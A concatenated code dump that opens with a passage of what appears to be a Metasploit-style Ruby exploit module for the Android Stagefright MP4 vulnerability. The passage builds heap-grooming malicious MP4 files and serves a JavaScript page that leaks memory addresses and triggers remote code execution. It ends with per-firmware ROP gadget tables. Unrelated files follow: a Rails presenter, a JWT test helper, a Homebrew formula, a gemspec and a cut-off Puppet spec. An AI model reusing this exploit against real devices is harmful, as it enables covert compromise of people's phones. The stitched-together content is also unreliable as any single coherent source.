# We add some BS entries just to kill the real 'heig' and get proper
# ordering...
near_sampiter_addr = peer[:near_sampiter_addr]
if near_sampiter_addr.nil?
# Part 1. Leak the address of a chunk that should be adjacent to a
# SampleIterator object.
if is_samsung
# On Samsung:
# Before: dmcE, dura, frmR, heig, hvcC, inpS, lang, mime, widt
# After: dmcE, abc1, abc2, abc3, heig...
more_data << get_metaitem('dmcE', 'in32', 1)
more_data << get_metaitem('abc1', 'in32', 31335)
more_data << get_metaitem('abc2', 'in32', 31336)
end
# On Nexus:
# Before: heig, hvcc, inpS, mime, text, widt
# After: abc3, heig...
more_data << get_metaitem('abc3', 'in32', 31337)
# NOTE: We only use the first 12 bytes so that we don't overwrite the
# pointer that is already there!
heig = get_metaitem('heig', 'in32', 31338)
more_data << heig[0,12]
else
# Part 2. Read from the specified address, as with the original Metaphor
# exploit.
if is_samsung
# On Samsung:
# Before: dmcE, dura, frmR, heig, hvcC, inpS, lang, mime, widt
# After: dmcE, dura, ...
more_data << get_metaitem('dmcE', 'in32', 1)
else
# On Nexus:
# Before: avcc, heig, inpS, mime, text, widt
# After: dura, ...
near_sampiter = get_atom('avcC', "C" * sampiter_alloc_size)
end
# Try to read the mCurrentChunkSampleSizes vtable ptr within a
# SampleIterator object. This only works because the Vector is empty thus
# passing the restrictions imposed by the duration conversion.
ptr_to_vector_vtable = near_sampiter_addr - (sampiter_rounded * 2) + 0x30
more_data << get_metaitem('dura', 'in64', ptr_to_vector_vtable)
end
# The tx3g2 then needs to trigger the integer overflow, but can contain any
# contents. The overflow will terminate at the end of the file.
#
# NOTE: The second tx3g chunk's overhead ends up in the slack space between
# the replaced placeholder and the MetaData Vector contents.
big_num = 0x1ffffffff - tx3g_1.length + 1 + vector_alloc_size
tx3g_2 = get_atom('tx3g', more_data, big_num)
# Create a minimal, verified 'trak' to satisfy mLastTrack being set
stbl_data = get_stsc(1)
stbl_data << get_atom('stco', [ 0, 0 ].pack('N*')) # version, mNumChunkOffsets
stbl_data << get_atom('stsz', [ 0, 0, 0 ].pack('N*')) # version, mDefaultSampleSize, mNumSampleSizes
stbl_data << get_atom('stts', [ 0, 0 ].pack('N*')) # version, mTimeToSampleCount
stbl = get_atom('stbl', stbl_data)
verified_trak = get_atom('trak', stbl)
# Start putting it all together into a track.
trak_data = ''
if is_samsung
# Put some legitimate duration information so we know if we failed
mdhd_data = [ 0 ].pack('N') # version
mdhd_data << "\x00" * 8 # padding
mdhd_data << [ 1 ].pack('N') # timescale
mdhd_data << [ 314 ].pack('N') # duration
mdhd_data << [ 0 ].pack('n') # lang
trak_data << get_atom('mdhd', mdhd_data)
end
# Add this so that our file is identified as video/mp4
mp4v_data = ''
mp4v_data << [ 0 ].pack('C') * 24 # padding
mp4v_data << [ 1024 ].pack('n') # width
mp4v_data << [ 768 ].pack('n') # height
mp4v_data << [ 0 ].pack('C') * (78 - mp4v_data.length) # padding
trak_data << get_atom('mp4v', mp4v_data) # satisfy hasVideo = true
# Here, we cause allocations such that we can replace the placeholder...
if is_samsung
trak_data << placeholder # Somethign we can free
trak_data << shape_vector # Eat the loose block...
trak_data << stbl # Cause the growth of the track->meta Vector
else
trak_data << stbl # Cause the growth of the track->meta Vector
trak_data << placeholder # Somethign we can free
trak_data << shape_vector # Eat the loose block...
end
# Add the thing whose entry in the MetaData vector we want to overwrite...
trak_data << near_sampiter
# Get our overflow data into memory
trigger = ''
trigger << tx3g_1
# Free the place holder
trigger << get_atom('titl', ('t' * 4) + ('BBBB' * vector_alloc_size) + [ 0 ].pack('C'))
# Overflow the temporary buffer into the following MetaData array
trigger << tx3g_2
# !!! NOTE !!!
# On Samsung devices, the failure that causes ERR to be returned from
# 'tx3g' processing leads to "skipTrack" being set. This means our
# nasty track and it's metadata get deleted and not returned to the
# browser -- effectively killing the infoleak.
#
# However! It also handles "skipTrack" being set specially and does not
# immediately propagate the error to the caller. Instead, it returns OK.
# This allows us to triggering the bug multiple times in one file, or --
# as we have in this case -- survive after and return successfully.
if is_samsung
# Add this as a nested track!
trak_data << get_atom('trak', trigger)
else
trak_data << trigger
end
trak = get_atom('trak', trak_data)
# On Samsung devices, we could put more chunks here but they will
# end up smashing the temporary buffer further...
chunks = []
chunks << get_ftyp()
chunks << get_atom('moov')
chunks << verified_trak * 0x200
chunks << shape_vector * groom_count
chunks << trak
mp4 = chunks.join
mp4
end
def get_mp4_rce(my_target, peer)
# MPEG4 Fileformat Reference:
# http://qtra.apple.com/index.html
#
# Structure:
# [File type Chunk][Other Atom Chunks]
#
# Where [Chunk] == [Atom/Box Length][Atom/Box Type][Atom/Box Data]
#
chunks = []
chunks << get_ftyp()
# Note, this causes a few allocations
moov_data = ''
mvhd_data = [ 0, 0x41414141 ].pack('N*')
mvhd_data << 'B' * 0x5c
moov_data << get_atom('mvhd', mvhd_data)
# Add a minimal, verified 'trak' to satisfy mLastTrack being set
verified_trak = ''
stbl_data = get_stsc(0x28)
stbl_data << get_atom('stco', [ 0, 0 ].pack('N*')) # version, mNumChunkOffsets
stbl_data << get_atom('stsz', [ 0, 0, 0 ].pack('N*')) # version, mDefaultSampleSize, mNumSampleSizes
stbl_data << get_atom('stts', [ 0, 0 ].pack('N*')) # version, mTimeToSampleCount
verified_trak << get_atom('trak', get_atom('stbl', stbl_data))
# Add it to the file
moov_data << verified_trak
# The spray_addr field is typically determined empirically (by testing), but
# has proven to be fairly predictable (99%). However, it does vary from
# one device to the next (probably determined by the pre-loaded libraries).
spray_addr = 0xb0c08000
spray_addr = my_target['SprayAddress'] if not my_target['SprayAddress'].nil?
# Construct a single page that we will spray
page = build_spray(my_target, peer, spray_addr)
return nil if page.nil?
# Build a big block full of spray pages and and put it in an avcC chunk
# (but don't add it to the 'moov' yet)
spray = page * (((16 * 1024 * 1024) / page.length) - 20)
avcc = get_atom('avcC', spray)
# Make the nasty trak
tkhd1 = ''
tkhd1 << [ 0 ].pack('C') # version
tkhd1 << 'D' * 3 # padding
tkhd1 << 'E' * (5*4) # {c,m}time, id, ??, duration
tkhd1 << 'F' * 0x10 # ??
tkhd1 << [
0x10000, # a00
0, # a01
0, # dx
0, # a10
0x10000, # a11
0 # dy
].pack('N*')
tkhd1 << 'G' * 0x14 # ??
# Add the tkhd (track header) to the nasty track
trak1 = ''
trak1 << get_atom('tkhd', tkhd1)
# Build and add the 'mdia' (Media information) to the nasty track
mdia1 = ''
mdhd1 = [ 0 ].pack('C') # version
mdhd1 << 'D' * 0x17 # padding
mdia1 << get_atom('mdhd', mdhd1)
mdia1 << get_atom('hdlr', 'F' * 0x38) # Media handler
dinf1 = ''
dinf1 << get_atom('dref', 'H' * 0x14) # Data information box
minf1 = ''
minf1 << get_atom('smhd', 'G' * 0x08)
minf1 << get_atom('dinf', dinf1)
stbl1 = get_stsc(2)
minf1 << get_atom('stbl', stbl1)
mdia1 << get_atom('minf', minf1)
trak1 << get_atom('mdia', mdia1)
# Add something to take up a slot in the 0x20 size range
# NOTE: We have to be able to free this later...
block = 'Q' * 0x1c
trak1 << get_atom('covr', get_atom('data', [ 0, 0 ].pack('N*') + block))
# Add a Track (hopefully right after)
trak1 << verified_trak
# Add the avcC chunk with the heap spray. We add it here so it's sure to be
# allocated when we get control of the program counter...
trak1 << avcc
# Build the first of the nasty pair of tx3g chunks that trigger the
# vulnerability
alloc_size = 0x20
overflow_size = 0xc0
overflow = [ spray_addr ].pack('V') * (overflow_size / 4)
tx3g_1 = get_atom('tx3g', overflow)
trak1 << tx3g_1
# Free the original thing and put the tx3g temporary in it's place...
block = 'R' * 0x40
trak1 << get_atom('covr', get_atom('data', [ 0, 0 ].pack('N*') + block))
# Make the second one, which triggers the integer overflow
big_num = 0x1ffffffff - 8 - overflow.length + 1 + alloc_size
more_data = [ spray_addr ].pack('V') * (overflow_size / 4)
tx3g_2 = get_atom('tx3g', more_data, big_num)
trak1 << tx3g_2
# Add the nasty track to the moov data
moov_data << get_atom('trak', trak1)
# Finalize the moov chunk
moov = get_atom('moov', moov_data)
chunks << moov
# Combine outer chunks together and voila.
mp4 = chunks.join
mp4
end
def on_request_uri(cli, request)
# If the request is for an mp4 file, we need to get the target from the @peers hash
if request.uri =~ /\.mp4\?/i
mp4_fn = request.uri.split('/')[-1]
mp4_fn = mp4_fn.split('?')[0]
mp4_fn[-4,4] = ''
peer = @peers[mp4_fn]
my_target = nil
my_target = peer[:target] if peer
if my_target.nil?
send_not_found(cli)
print_error("#{cli.peerhost}:#{cli.peerport} - Requested #{request.uri} - Unknown peer")
return
end
# Extract the address(s) we just leaked...
sia_addr = request.qstring['sia'].to_i # near_sampiter data address
peer[:near_sampiter_addr] = sia_addr if sia_addr > 0
sfv_addr = request.qstring['sfv'].to_i # stagefright Vector<size_t> vtable ptr
peer[:vector_vtable_addr] = sfv_addr if sfv_addr > 0
# reset after a crash..
if sia_addr == 0 && sfv_addr == 0
peer[:near_sampiter_addr] = peer[:vector_vtable_addr] = nil
end
# Always use this header
out_hdrs = {'Content-Type'=>'video/mp4'}
if peer[:vector_vtable_addr].nil?
# Generate the nasty MP4 to leak infoz
mode = "infoleak"
mp4 = get_mp4_leak(my_target, peer)
else
mode = "RCE"
mp4 = get_mp4_rce(my_target, peer)
if mp4.nil?
send_not_found(cli)
print_error("#{cli.peerhost}:#{cli.peerport} - Requested #{request.uri} - Failed to generate RCE MP4")
return
end
end
# Send the nasty MP4 file to trigger the vulnerability
if request.headers['Accept-Encoding'] and request.headers['Accept-Encoding'].include? 'gzip'
mp4 = Rex::Text.gzip(mp4)
out_hdrs.merge!('Content-Encoding' => 'gzip')
gzip = "gzip'd"
else
gzip = "raw"
end
client = "Browser"
if request.headers['User-Agent'].include? 'stagefright'
client = "SF"
end
addrs = "heap: 0x%x, code: 0x%x" % [ peer[:near_sampiter_addr].to_i, peer[:vector_vtable_addr].to_i ]
print_status("Sending #{mode} #{gzip} MPEG4 (#{mp4.length} bytes) to #{cli.peerhost}:#{cli.peerport}... (#{addrs} from #{client})")
# Send the nastiness!
send_response(cli, mp4, out_hdrs)
return
end
# Initialize a target. If none suitable, then we don't continue.
my_target = target
if my_target.name =~ /Automatic/
my_target = get_target(request)
if my_target.nil?
send_not_found(cli)
print_error("#{cli.peerhost}:#{cli.peerport} - Requested #{request.uri} - Unknown user-agent: #{request['User-Agent'].inspect}")
return
end
vprint_status("Target selected: #{my_target.name}")
end
# Generate an MP4 filename for this peer
mp4_fn = rand_text_alpha(11)
# Save the target for when they come back asking for this file
# Also initialize the leak address to the first one
@peers[mp4_fn] = { :target => my_target }
# Send the index page
mp4_uri = "#{get_resource.chomp('/')}/#{mp4_fn}.mp4"
html = %Q^<html>
<head>
<title>Please wait...</title>
<script>
var video; // the video tag
var to_id; // timeout ID
var req_start; // when we requested the video
var load_start; // when we loaded the video
// Give mediaserver some time to settle down after restarting -- increases reliability
var waitTime = 100; // 6000;
var error = false;
var near_sampiter_addr = -1;
var vector_vtable_addr = -1;
var crashes = 0;
function duration_changed() {
var now = Date.now();
var req_time = now - req_start;
var load_time = now - load_start;
console.log('duration changed to: ' + video.duration + ' (load: ' + load_time + ', req: ' + req_time + '), 0x' + video.videoWidth.toString(16) + ' x 0x' + video.videoHeight.toString(16));
if (load_time > 2000) {
// probably crashed. reset the entire process..
near_sampiter_addr = -1;
vector_vtable_addr = -1;
waitTime = 6000;
crashes += 1;
if (crashes > 5) {
console.log('too many crashes!!!');
stop_everything();
}
}
else {
// if we got the near_sampiter_addr already, we are now trying to read the code pointer.
// otherwise, we're trying to find near_sampiter_addr...
if (near_sampiter_addr == -1) {
// if we get this value, we failed to overwrite the metadata. try again.
if (video.videoHeight != 768) { // XXX: TODO: parameterize
if (video.videoHeight != 0) { // wtf? crashed??
value = video.videoHeight;
console.log('leaked heap pointer: 0x' + value.toString(16));
near_sampiter_addr = value;
}
}
} else if (vector_vtable_addr == -1) {
// if we get this value, we failed to overwrite the metadata. try again.
if (video.duration != 314) { // XXX: TODO: parameterize
// zero means a value that could not be represented...
if (video.duration != 0) {
var value = Math.round(video.duration * 1000000);
console.log('leaked memory: ' + video.duration + ' (near_sampiter_addr: 0x' + near_sampiter_addr.toString(16) + '): 0x' + value.toString(16));
vector_vtable_addr = value;
}
}
}
// otherwise, we just keep trying with the data we have...
}
if (error == false) {
if (vector_vtable_addr == -1) {
to_id = setTimeout(reload_leak, waitTime);
} else {
to_id = setTimeout(reload_rce, waitTime);
}
waitTime = 100;
}
}
function stop_everything() {
if (error == false) {
console.log('---- GIVING UP!! ----');
error = true;
}
if (to_id != -1) {
clearTimeout(to_id);
}
}
function start() {
video = document.getElementById('vid');
video.onerror = function() {
console.log(' onError called!');
stop_everything();
}
video.ondurationchange = duration_changed;
//reload_rce();
reload_leak();
}
function get_uri() {
var rn = Math.floor(Math.random() * (0xffffffff - 1)) + 1;
var uri = '#{mp4_uri}?x=' + rn;
if (near_sampiter_addr != -1) {
uri += '&sia=' + near_sampiter_addr;
}
if (vector_vtable_addr != -1) {
uri += '&sfv=' + vector_vtable_addr;
}
return uri;
}
function reload_leak() {
to_id = -1;
var xhr = new XMLHttpRequest;
xhr.responseType = 'blob';
xhr.onreadystatechange = function() {
if (xhr.readyState == 4) {
if (xhr.status != 200 || !xhr.response) {
stop_everything();
return;
}
load_start = Date.now();
try {
//var url = URL.createObjectURL(xhr.response);
var a = new FileReader();
a.onload = function(e) {
//console.log('onload: ' + e.target.result);
video.src = e.target.result
};
a.onerror = function(e) { console.log('blob 2 data error: ' + e.error); }
a.readAsDataURL(xhr.response);
} catch(e) {
console.log(' ERROR: ' + e.message);
stop_everything();
}
}
};
xhr.open('GET', get_uri(), true);
req_start = Date.now();
xhr.send();
}
function reload_rce() {
to_id = -1;
video.src = get_uri();
}
</script></head>
<body onload='start()'>
<video id=vid width=1px controls>
Your browser does not support VIDEO tags.
</video><br />
Please wait while we locate your content...
</body>
</html>
^
print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
#
# Return some firmware-specific values to the caller.
#
# The VectorRVA field is extracted using the following command:
#
# $ arm-eabi-readelf -a libstagefright.so | grep _ZTVN7android6VectorIjEE
#
def get_details(my_target)
details = {
'lrx' => {
'VectorRVA' => 0x10ae30,
'PivotStrategy' => 'lrx',
'Pivot1' => 0x67f7b, # ldr r4, [r0] ; ldr r1, [r4, #0x10] ; blx r1
'Pivot2' => 0xaf9dd, # ldm.w r4, {sp} ; pop {r3, pc}
'Adjust' => 0x475cd # pop {r3, r4, pc}
},
'lmy-1' => {
'VectorRVA' => 0x10bd58,
'PivotStrategy' => 'lmy-1',
'Pivot1' => 0x68783, # ldr r4, [r0] ; ldr r1, [r4, #0x10] ; blx r1
'Pivot2' => 0x81959, # ldm.w r4, {r1, ip, sp, pc}
'Adjust' => 0x479b1 # pop {r3, r4, pc}
},
'lmy-2' => {
'VectorRVA' => 0x10bd58,
'PivotStrategy' => 'lmy-2',
'Pivot1' => 0x6f093, # ldr r0, [r0, #0x10] ; ldr r3, [r0] ; ldr r1, [r3, #0x18] ; blx r1
'Pivot2' => 0x81921, # ldm.w r0!, {r1, ip, sp, pc}
'Adjust' => 0x479b1 # pop {r3, r4, pc}
},
'shamu / LYZ28E' => {
'VectorRVA' => 0x116d58,
'PivotStrategy' => 'lyz',
'Pivot1' => 0x91e91, # ldr r0, [r0] ; ldr r6, [r0] ; ldr r3, [r6] ; blx r3
'Pivot2' => 0x72951, # ldm.w r0, {r0, r2, r3, r4, r6, r7, r8, sl, fp, sp, lr, pc}
'Adjust' => 0x44f81 # pop {r3, r4, pc}
},
'shamu / LYZ28J' => {
'VectorRVA' => 0x116d58,
'PivotStrategy' => 'lyz',
'Pivot1' => 0x91e49, # ldr r0, [r0] ; ldr r6, [r0] ; ldr r3, [r6] ; blx r3
'Pivot2' => 0x72951, # ldm.w r0, {r0, r2, r3, r4, r6, r7, r8, sl, fp, sp, lr, pc}
'Adjust' => 0x44f81 # pop {r3, r4, pc}
},
'sm-g900v / OE1' => {
'VectorRVA' => 0x174048,
'PivotStrategy' => 'sm-g900v',
'Pivot1' => 0x89f83, # ldr r4, [r0] ; ldr r5, [r4, #0x20] ; blx r5
'Pivot2' => 0xb813f, # ldm.w r4!, {r5, r7, r8, fp, sp, lr} ; cbz r0, #0xb8158 ; ldr r1, [r0] ; ldr r2, [r1, #4] ; blx r2
'Adjust' => 0x65421 # pop {r4, r5, pc}
}
}
details[my_target['Rop']]
end
end
| 33.283237 | 189 | 0.547909 |
1ad8b4e50cf65f362bf329f155b812f2408a5d2a | 563 | # frozen_string_literal: true
class StatementPresenter < SimpleDelegator
include Rails.application.routes.url_helpers
def self.wrap(statements)
statements.map { |statement| new(statement) }
end
def download_path
facility_account_statement_path(facility, account, id, format: :pdf)
end
def order_count
order_details.count
end
def sent_at
I18n.l(created_at, format: :usa)
end
def sent_by
User.find(created_by).full_name
rescue ActiveRecord::RecordNotFound
I18n.t("statements.show.created_by.unknown")
end
end
| 18.766667 | 72 | 0.746004 |
91bd9726b79be38d7ed6d6d004090cf3cdfdb3a9 | 1,001 | # encoding: UTF-8
# frozen_string_literal: true
Bundler.require
Test::Unit::TestCase.test_order = :random
require "active_support/inflections"
require "active_support/core_ext/kernel/reporting"
require "securerandom"
require "openssl"
require "base64"
require "set"
ActiveSupport::Inflector.inflections do |inflect|
inflect.acronym "API"
inflect.acronym "v1"
inflect.acronym "v2"
end
module MyAPIv1
class JWTAuthenticator < JWT::Authenticator
end
end
ENV["MY_API_V2_JWT_ISS"] = "foo"
ENV["MY_API_V2_JWT_AUD"] = "foo,bar,baz"
ENV["MY_API_V2_JWT_SUB"] = "session"
ENV["MY_API_V2_JWT_ALG"] = "RS256"
ENV["MY_API_V2_JWT_KEY"] = Base64.urlsafe_encode64(OpenSSL::PKey::RSA.generate(2048).to_pem)
module MyAPIv2
class JWTAuthenticator < JWT::Authenticator
private
def public_key(*)
OpenSSL::PKey.read(Base64.urlsafe_decode64(ENV["MY_API_V2_JWT_KEY"])).public_key
end
end
end
module MyAPI
module V3
class JWTAuthenticator < JWT::Authenticator
end
end
end
| 19.627451 | 92 | 0.753247 |
1aab1358e9cb3426fa7b290ada5e7993ccc2a329 | 6,911 | require "language/node"
class Emscripten < Formula
desc "LLVM bytecode to JavaScript compiler"
homepage "https://emscripten.org/"
url "https://github.com/emscripten-core/emscripten/archive/2.0.32.tar.gz"
sha256 "c0ba34094ddf69ab7f24164c657a816d7256142a58f5e93aa74987d25945287b"
license all_of: [
"Apache-2.0", # binaryen
"Apache-2.0" => { with: "LLVM-exception" }, # llvm
any_of: ["MIT", "NCSA"], # emscripten
]
head "https://github.com/emscripten-core/emscripten.git"
livecheck do
url :stable
regex(/^v?(\d+(?:\.\d+)+)$/i)
end
bottle do
sha256 cellar: :any, arm64_monterey: "8e6c7a3c8eb5d37c4c3910aad2e1c60e7b4936c15190c653080d85ff43197e3b"
sha256 cellar: :any, arm64_big_sur: "ffcfe2eaec015ece0df30c21a13da5c4d4a39f832c62f34ad5d61d181d7cd5cd"
sha256 cellar: :any, monterey: "69573c8cc9e3bbb80bb29cd6b0ffcd66c6ca3bcb6f3d7986d963bc0a1233b553"
sha256 cellar: :any, big_sur: "c22c85d9f3504f914e80a5d24a2aa5e5e2b954988320878aa09d1adc1b99dc3f"
sha256 cellar: :any, catalina: "25c29d35b9d637111d8f394713c0cd764421a147088bdae3aa64017dcd721293"
sha256 cellar: :any, mojave: "06e083841d95c745a3be928a1ed08aedf83238109de60fabbbc5932083757106"
sha256 cellar: :any_skip_relocation, x86_64_linux: "0a34435dca7a88bcaeef77cbff59cb892466acb456507bd2f9b7147f45c74ddd"
end
depends_on "cmake" => :build
depends_on "node"
depends_on "[email protected]"
depends_on "yuicompressor"
# OpenJDK is needed as a dependency on Linux and ARM64 for google-closure-compiler,
# an emscripten dependency, because the native GraalVM image will not work.
on_macos do
depends_on "openjdk" if Hardware::CPU.arm?
end
on_linux do
depends_on "gcc"
depends_on "openjdk"
end
fails_with gcc: "5"
# Use emscripten's recommended binaryen revision to avoid build failures.
# See llvm resource below for instructions on how to update this.
resource "binaryen" do
url "https://github.com/WebAssembly/binaryen.git",
revision: "c19ff59c71824b34fa312aac9ad979e2198d7d36"
end
# emscripten needs argument '-fignore-exceptions', which is only available in llvm >= 12
# To find the correct llvm revision, find a corresponding commit at:
# https://github.com/emscripten-core/emsdk/blob/main/emscripten-releases-tags.json
# Then take this commit and go to:
# https://chromium.googlesource.com/emscripten-releases/+/<commit>/DEPS
# Then use the listed llvm_project_revision for the resource below.
resource "llvm" do
url "https://github.com/llvm/llvm-project.git",
revision: "9403514e764950a0dfcd627fc90c73432314bced"
end
def install
ENV.cxx11
# All files from the repository are required as emscripten is a collection
# of scripts which need to be installed in the same layout as in the Git
# repository.
libexec.install Dir["*"]
# emscripten needs an llvm build with the following executables:
# https://github.com/emscripten-core/emscripten/blob/#{version}/docs/packaging.md#dependencies
resource("llvm").stage do
projects = %w[
clang
lld
]
targets = %w[
host
WebAssembly
]
llvmpath = Pathname.pwd/"llvm"
# Apple's libstdc++ is too old to build LLVM
ENV.libcxx if ENV.compiler == :clang
# compiler-rt has some iOS simulator features that require i386 symbols
# I'm assuming the rest of clang needs support too for 32-bit compilation
# to work correctly, but if not, perhaps universal binaries could be
# limited to compiler-rt. llvm makes this somewhat easier because compiler-rt
# can almost be treated as an entirely different build from llvm.
ENV.permit_arch_flags
args = std_cmake_args.reject { |s| s["CMAKE_INSTALL_PREFIX"] } + %W[
-DCMAKE_INSTALL_PREFIX=#{libexec}/llvm
-DLLVM_ENABLE_PROJECTS=#{projects.join(";")}
-DLLVM_TARGETS_TO_BUILD=#{targets.join(";")}
-DLLVM_LINK_LLVM_DYLIB=ON
-DLLVM_BUILD_LLVM_DYLIB=ON
-DLLVM_INCLUDE_EXAMPLES=OFF
-DLLVM_INCLUDE_TESTS=OFF
-DLLVM_INSTALL_UTILS=OFF
]
sdk = MacOS.sdk_path_if_needed
args << "-DDEFAULT_SYSROOT=#{sdk}" if sdk
if MacOS.version == :mojave && MacOS::CLT.installed?
# Mojave CLT linker via software update is older than Xcode.
# Use it to retain compatibility.
args << "-DCMAKE_LINKER=/Library/Developer/CommandLineTools/usr/bin/ld"
end
mkdir llvmpath/"build" do
# We can use `make` and `make install` here, but prefer these commands
# for consistency with the llvm formula.
system "cmake", "-G", "Unix Makefiles", "..", *args
system "cmake", "--build", "."
system "cmake", "--build", ".", "--target", "install"
end
end
resource("binaryen").stage do
args = std_cmake_args.reject { |s| s["CMAKE_INSTALL_PREFIX"] } + %W[
-DCMAKE_INSTALL_PREFIX=#{libexec}/binaryen
]
system "cmake", ".", *args
system "make", "install"
end
cd libexec do
system "npm", "install", *Language::Node.local_npm_install_args
rm_f "node_modules/ws/builderror.log" # Avoid references to Homebrew shims
# Delete native GraalVM image in incompatible platforms.
if OS.linux?
rm_rf "node_modules/google-closure-compiler-linux"
elsif Hardware::CPU.arm?
rm_rf "node_modules/google-closure-compiler-osx"
end
end
# Add JAVA_HOME to env_script on ARM64 macOS and Linux, so that google-closure-compiler
# can find OpenJDK
emscript_env = { PYTHON: Formula["[email protected]"].opt_bin/"python3" }
emscript_env.merge! Language::Java.overridable_java_home_env if OS.linux? || Hardware::CPU.arm?
%w[em++ em-config emar emcc emcmake emconfigure emlink.py emmake
emranlib emrun emscons].each do |emscript|
(bin/emscript).write_env_script libexec/emscript, emscript_env
end
end
def post_install
system bin/"emcc", "--check"
if File.exist?(libexec/".emscripten") && !File.exist?(libexec/".homebrew")
touch libexec/".homebrew"
inreplace "#{libexec}/.emscripten" do |s|
s.gsub!(/^(LLVM_ROOT.*)/, "#\\1\nLLVM_ROOT = \"#{opt_libexec}/llvm/bin\"\\2")
s.gsub!(/^(BINARYEN_ROOT.*)/, "#\\1\nBINARYEN_ROOT = \"#{opt_libexec}/binaryen\"\\2")
end
end
end
test do
# Fixes "Unsupported architecture" Xcode prepocessor error
ENV.delete "CPATH"
(testpath/"test.c").write <<~EOS
#include <stdio.h>
int main()
{
printf("Hello World!");
return 0;
}
EOS
system bin/"emcc", "test.c", "-o", "test.js", "-s", "NO_EXIT_RUNTIME=0"
assert_equal "Hello World!", shell_output("node test.js").chomp
end
end
| 36.957219 | 123 | 0.67313 |
9184945d3188eacdfe8c548d16b21622e5cc91e8 | 1,301 | # -*- encoding: utf-8 -*-
require File.expand_path('../lib/rollbar/version', __FILE__)
Gem::Specification.new do |gem|
_is_jruby = defined?(JRUBY_VERSION) || (defined?(RUBY_ENGINE) && RUBY_ENGINE == 'jruby')
gem.authors = ['Rollbar, Inc.']
gem.email = ['[email protected]']
gem.description = 'Easy and powerful exception tracking for Ruby'
gem.executables = ['rollbar-rails-runner']
gem.summary = 'Reports exceptions to Rollbar'
gem.homepage = 'https://rollbar.com'
gem.license = 'MIT'
gem.files = `git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
gem.files += ['spec/support/rollbar_api.rb'] # useful helper for app spec/tests.
gem.name = 'rollbar'
gem.require_paths = ['lib']
gem.required_ruby_version = '>= 2.0.0'
gem.version = Rollbar::VERSION
if gem.respond_to?(:metadata)
gem.metadata['changelog_uri'] = 'https://github.com/rollbar/rollbar-gem/releases'
gem.metadata['source_code_uri'] = 'https://github.com/rollbar/rollbar-gem'
gem.metadata['bug_tracker_uri'] = 'https://github.com/rollbar/rollbar-gem/issues'
gem.metadata['homepage_uri'] = 'https://rollbar.com/'
gem.metadata['documentation_uri'] = 'https://docs.rollbar.com/docs/ruby'
end
end
| 43.366667 | 103 | 0.657187 |
283201ba95d6dfea6ad46e352836847c86a53ff0 | 6,729 | require 'spec_helper'
describe 'datadog_agent::integrations::elasticsearch' do
ALL_SUPPORTED_AGENTS.each do |agent_major_version|
context 'supported agents' do
let(:pre_condition) { "class {'::datadog_agent': agent_major_version => #{agent_major_version}}" }
conf_file = if agent_major_version == 5
'/etc/dd-agent/conf.d/elastic.yaml'
else
"#{CONF_DIR}/elastic.d/conf.yaml"
end
it { is_expected.to compile.with_all_deps }
it {
is_expected.to contain_file(conf_file).with(
owner: DD_USER,
group: DD_GROUP,
mode: PERMISSIONS_FILE,
)
}
it { is_expected.to contain_file(conf_file).that_requires("Package[#{PACKAGE_NAME}]") }
it { is_expected.to contain_file(conf_file).that_notifies("Service[#{SERVICE_NAME}]") }
context 'with default parameters' do
it { is_expected.to contain_file(conf_file).with_content(%r{ - url: http://localhost:9200}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ cluster_stats: false}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ index_stats: false}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ pending_task_stats: true}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ pshard_stats: false}) }
it { is_expected.not_to contain_file(conf_file).with_content(%r{ username}) }
it { is_expected.not_to contain_file(conf_file).with_content(%r{ password}) }
it { is_expected.not_to contain_file(conf_file).with_content(%r{ ssl_verify}) }
it { is_expected.not_to contain_file(conf_file).with_content(%r{ ssl_cert}) }
it { is_expected.not_to contain_file(conf_file).with_content(%r{ ssl_key}) }
it { is_expected.not_to contain_file(conf_file).with_content(%r{ tags:}) }
end
context 'with parameters set' do
let(:params) do
{
password: 'password',
pending_task_stats: false,
url: 'https://foo:4242',
username: 'username',
ssl_cert: '/etc/ssl/certs/client.pem',
ssl_key: '/etc/ssl/private/client.key',
tags: ['tag1:key1'],
}
end
it { is_expected.to contain_file(conf_file).with_content(%r{ - url: https://foo:4242}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ pending_task_stats: false}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ username: username}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ password: password}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ ssl_verify: true}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ ssl_cert: /etc/ssl/certs/client.pem}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ ssl_key: /etc/ssl/private/client.key}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ tags:}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ - tag1:key1}) }
end
context 'with multiple instances set' do
let(:params) do
{
instances: [
{
'cluster_stats' => true,
'index_stats' => false,
'password' => 'password',
'pending_task_stats' => false,
'pshard_stats' => true,
'url' => 'https://foo:4242',
'username' => 'username',
'ssl_verify' => true,
'ssl_cert' => '/etc/ssl/certs/client.pem',
'ssl_key' => '/etc/ssl/private/client.key',
'tags' => ['tag1:key1'],
},
{
'cluster_stats' => false,
'index_stats' => true,
'password' => 'password_2',
'pending_task_stats' => true,
'pshard_stats' => false,
'url' => 'https://bar:2424',
'username' => 'username_2',
'ssl_verify' => false,
'tags' => ['tag2:key2'],
},
],
}
end
it { is_expected.to contain_file(conf_file).with_content(%r{instances:}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ - url: https://foo:4242}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ cluster_stats: true}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ index_stats: false}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ pending_task_stats: false}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ username: username}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ password: password}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ pshard_stats: true}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ ssl_verify: true}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ ssl_cert: /etc/ssl/certs/client.pem}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ ssl_key: /etc/ssl/private/client.key}) }
it { is_expected.to contain_file(conf_file).with_content(%r{ tags:\n - tag1:key1}) }
